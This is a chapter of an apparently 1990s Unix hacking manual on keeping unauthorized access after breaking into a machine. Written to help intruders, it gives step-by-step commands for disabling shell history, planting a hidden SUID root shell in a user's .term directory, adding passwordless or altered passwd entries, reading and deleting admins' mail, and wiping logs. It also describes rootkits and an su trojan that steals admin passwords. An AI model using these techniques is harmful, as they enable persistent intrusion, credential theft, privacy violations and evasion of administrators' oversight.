Chapter 7 Keeping access to the machine ------------------------------ There are many ways to keep access to the machine, you will loose access to many as you as you are learning, but I hope with this manual and some experience you will become a stable hacker. Section 7A Tricks of the trade Here are some 'tricks' of the trade that will help you keep access to the machine. After a system admin has found you out, they will be watching for you and going through everything on the system. They will go as far as recompiling binary files, changing everyone's passwords, denying your host you came in from to the machine, going through the passwd or shadow file, looking for SUID files, etc.... When you see that you have been found out, do not try to get access to the system again. I have seen others right after being cought, try everyone of their trojans, other accounts, and other backdoor's they placed for continued access. Well think about it, they are watching for you ... you are showing them every in that you have to the system, and every exploitable file you are making known to them. NO! WAIT! Give it a few months, they will think everything is ok, and they will relax and you can come in with one of the backdoor's they missed, and you can do your thing on the logs for all of the attempts you made on the system to get back in. Ok here are some tricks of the trade. History Files: -------------- Always put your .bash_history to /dev/null, if you don't make sure you at least edit it. Remember the .bash_history will always have your last commands until the logoff. So if you edit it, it will show that you are editing it. You might try changing your shell and editing it there, but this all seems like a pain, just set it to /dev/null 1. Delete the file in the user directory .bash_history if it there. 2. Type this command in the home directory: ln -s /dev/null .bash_history Nested directory: ----------------- Always find a directory on the system to hide your files. There are a few good ones that most users never look into. In the users home directory look for .term, all you will find in this directory is an executable file called termrc. Admin's and users alike are used to seeing this hidden directory, and never EVER go into it. if they did what do you think they would say to an executable file being in there called termrc? You are right! Nothing .... it belongs there and it is what they expect to see there. So lets say we make termrc a little bigger, and add suid perm's ... are you getting the idea???? I hope you guessed it... go to the /bin directory and type cp bash (or sh whatever is there) ~username/.term/termrc then type : chown root ~username/.term/termrc : chgrp root ~username/.term/termrc : chmod +s ~username/.term/termrc Now you have a nested file that can get you root on the system any time that will not be easy for the admin to find. If you want to get fancy, touch the file date to make it look like an older file. Another directory off the user accounts expected to be there and unused would be .elm, .term or Mail, or try making a directory called '...' this is harder to notice seeing the first directories that show are . and .., so it can go un-noticed easy. This is how it would look if they did a long ls: 1024 Jan 29 21:03 . 1024 Dec 28 00:12 .. 1024 Jan 29 21:03 ... 509 Mar 02 1996 .bash_history 22 Feb 20 1996 .forward 164 May 18 1996 .kermrc 34 Jun 06 1993 .less 114 Nov 23 1993 .lessrc 1024 May 18 1996 .term 1024 May 19 1996 public_html see how it seems to just fit into place? but if it was just a ls -l, this is what would be seen: 1024 May 19 1996 public_html Remember you can always look for some REAL LONG file path that you are sure that no one would ever even want to enter into, and use this for your nested directory. You can even make your own directory there like:(...) ;) Making new commands -------------------- After you check the cron to see if there is md5 being used there, you might want to either copy one of your exploits to another filename in the system, or maybe just overwrite a command that you know would never be used. If you copy to a new file name make sure you touch the file date. This is not so long lasting because sooner or later they will patch the exploit and your new file you made will not work anymore. It is better to use a shell for the new filename, and then make it suid. Adding or changing passwd entry's --------------------------------- Another backdoor that you can use is to add a new user to the passwd file. This needs to be done with caution making it look like it belongs there. Never use your passwd addition, never login, it is just for a backup in case you loose access. There are different thoughts here: you do not have to make it a root account that could cause notice to it right away. You know you can have root any time you want it. Lets practice ... We want to make our account look like it belongs, so lets keep to the top of the file. root:fVi3YqWnkd4rY:0:0:root:/root:/bin/bash sysop:mZjb4XjnJT1Ys:582:200:System Operator:/home/sysop:/bin/bash bin:*:1:1:bin:/bin: daemon:*:2:2:daemon:/sbin: adm:*:3:4:adm:/var/adm: lp:*:4:7:lp:/var/spool/lpd: sync:*:5:0:sync:/sbin:/bin/sync shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown halt:*:7:0:halt:/sbin:/sbin/halt mail:*:8:12:mail:/var/spool/mail: news:*:9:13:news:/usr/lib/news: uucp:*:10:14:uucp:/var/spool/uucppublic: operator:*:11:0:operator:/root:/bin/bash games:*:12:100:games:/usr/games: man:*:13:15:man:/usr/man: postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash nobody:*:65535:100:nobody:/dev/null: ftp:*:404:1::/home/ftp:/bin/bash Looking at the above passwd file leaves us a few options so i will just list them here. 1. Look at the user line for operator, ftp, and postmaster. All of these accounts have shells with no passwd's set yet. From your shell just type: passwd postmaster Set the account with no passwd by just pressing enter. Now you will be able to log into this account any time without a password and the file will still look right to the admin. 2. add this line to the passwd file: syst::13:12:system:/var/spool:/bin/bash Place it in the file where it seems to flow. You can leave the :: for the passwd or set the passwd to what you want by typing: passwd syst from the root shell. Set the group and id above to what you like. 3. Look at the line above for sync sync:*:5:0:sync:/sbin:/bin/sync Change this to : sync:*:5:0:sync:/sbin:/bin/bash and then run and leave the passwd blank. (or set a passwd don't matter) On this account we are even gid=0 rin Installing games ---------------- You could always install exploitable doom or abuse into the system if they already have games installed. I will include the root exploits for these games below in the appendix. Always be watching ------------------ Always know who the admin's are on a system, you can find them by looking at the passwd file to see home directories, placement of the uid, group access accounts, and ALWAYS read all of the bash_history files in the user directories to see who is using admin commands. You will also learn allot of new commands from reading history files, but you want to know who is who on the system. Get to know your system well. Look for users using su: View the log files to see who is using admin commands. Always be watching the system, keep track of who is on while you are. Watch the admin's history to see what commands they are using, ttysnoops? too many ps commands? finger commands after ps or w or who commands will show they are watching what other users on the system are doing. Watch your admin's and get to know how aware they are of users on their system. Reading system mail Rember first NEVER to use system mail programs! They will be able to tell you are reading their mail. I use a combo of a few things. Here you go... 1. cd /var/spool/mail This will put you into the directory that holds all of the unread mail, or waiting mail. Now you can do things like: grep -i security * |more grep -i hack * |more grep -i intruder * |more grep -i passwd * |more grep -i password * |more Then if needed pico username, and ctrl w to search for your maeesge. You can also delete messages if you see some other admin is telling them that your user name is hacking their machine from their domain. For a mail reader that will allow toy to read mail without updating pointers try: http://obsidian.cse.fau.edu/~fc has a util on it that can cat /var/spool/mail files without changing the last read dates.. ie they have no idea that you have read their mail. Also remember you can find other system mail in user's directories. Make sure to look in the /root directory. Look for /root/mail or username/mail or other directories or filders that contain older mail. Happy Hunting ... -------------------------------- Section 7B Root and Demon kits and trojans -------------------------------- Root kits are C source for ps, login, netstat and sometimes some other programs that have been hacked for you. With these kits you will be able to replace the login files on the hacked box so that you can login without an account on the machine. You will also be able to patch ps so that you will not show up when an admin uses the ps command. With the ps patch you can also have it not show processes that have certain file names such as any file that starts with 'sniff'. Demon kits will have hacked programs for identd, login demon, ping, su, telnetd, and, socket. Trojans will be any file that you can use that will allow you to exploit the system in some way. An su trojan placed in the admin's directory would run the trojan su first after you change the export path for him ;) and report back that he typed the wrong passwd and delete the trojan file, but saving the password he typed to the /tmp directory. A login trojan would save all login passwords to a file on the machine for you. I think you get the idea ;) Demon and Linux root kits have been uuencoded and attached to the end of appendix VI ****************************************** * Appendix I - Things to do after access * ****************************************** I think in this paper we have covered most of the things you can do after access, so I will make this in the style of a checklist from a to z. a. learn who the admin's are on the system b. watch the system with ps -auxe and ps -auxef (if it works) and pstree to try and keep track of what others are doing c. read all of the bash history files or any history files you can find on the machine to learn more yourself, and to learn about the users d. make as many backdoor's into the system as you can that you are sure will not be found out e. keep the access to yourself, don't give out users passwords on the machine you get root on. f. always clean your utmp and wtmp right away when you login g. always clean your mess as you go along, this includes your xferlog and messages h. if you have root access make sure to read /etc/syslog.conf and /etc/login.defs to see how the system is logging i. before changing binary files look at the root cron to see what they are running. j. look for md5 on the system k. look for separate ftp logs l. make sure to clean the www logs if you ever send phf commands to the server m. make an suid root shell and place it somewhere on the system n. do only what you are sure of, don't do everything in this hacking manual all at once or you are asking to get cought o. only use nested directories, do not put files into user directories where all they need to do is type ls to see them p. don't add user accounts and think they will not notice you. q. don't use pine or other mail programs to read users mail. if you want to read mail go to the mail dir and read it from unix, new mail you will find in /var/spool/mail read it there. r. don't change the system so that other programs they have running will not work any more, they will be on you like fly's on shit s. don't delete files on the system unless you put them there t. do not modify their web pages, like i was here ... you are not a hacker you are a little kid wanting attention u. do not change any passwords on the system (unless you are doing it for access and have backed up the passwd file and replace it right after you login v. do not use any root account machines for irc access, or to load a bot on w. if your root account changes or you create files that are owned by the wrong group, be sure to chown the files x. do not use .rhosts if there is already one there that is being used y. never telnet or ftp to your account from the hacked box z. don't fuck up their machine! only do what you know how to do.